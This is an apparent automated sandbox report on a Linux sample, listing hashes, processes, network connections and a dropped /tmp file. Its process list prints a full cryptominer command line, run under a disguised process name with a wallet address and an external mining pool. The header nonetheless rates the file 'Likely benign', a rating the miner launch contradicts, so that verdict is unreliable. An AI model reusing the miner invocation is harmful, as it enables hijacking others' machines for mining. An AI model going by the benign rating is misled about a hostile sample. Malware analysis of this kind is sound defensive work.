Analysis Overview
SHA256
77d533c4a4865fc909174204dd0a957fa1b79b74ad02b0a72ec313db80261087
Threat Level: Likely benign
The file 61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118 was found to be: Likely benign.
Malicious Activity Summary
Checks CPU configuration
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-21 03:40
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-21 03:40
Reported
2024-05-21 03:43
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
0s
Max time network
129s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/grep | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/bash.pid | /tmp/61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118 | N/A |
Processes
/tmp/61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118
[/tmp/61ea017359a6dce4665a44a82f6feb9e_JaffaCakes118]
/usr/bin/wc
[wc -l]
/usr/bin/sort
[sort -u]
/bin/grep
[grep ^core id /proc/cpuinfo]
/bin/uname
[uname -m]
/usr/bin/perl
[perl b.pl]
/tmp/h64
[./h64 -s sd-pam ./Word -a cryptonight -u 1QEVkXuQe8yN6PRHCQpxCfGQAFwTXBXxJj -o stratum+tcp://163.172.18.134:8080 -p x:[email protected] -k -B -l Word.txt --donate-level=1]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| GB | 195.181.164.15:443 | | tcp |
Files
/tmp/bash.pid
| MD5 | 94f95cdbde2a1f83e642c708096500d0 |
| SHA1 | a59ac422b60f8a6841bd649fe1f8fd5588dc6a9b |
| SHA256 | aef8505db2d1dea920d252288be2138f3cbbd4a72e1e29b08b875a7708288107 |
| SHA512 | e17531c92c55c2ef939a8ed8e3a573f50583326ba86bd4b3c65150b4ecfb66b3ed2ba489e60f7bbe4af0d3a057075ad1952acdb93482975167a6682096a4b699 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-21 03:40
Reported
2024-05-21 03:43
Platform
debian9-armhf-20240226-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-21 03:40
Reported
2024-05-21 03:40
Platform
debian9-mipsbe-20240226-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-21 03:40
Reported
2024-05-21 03:41
Platform
debian9-mipsel-20240226-en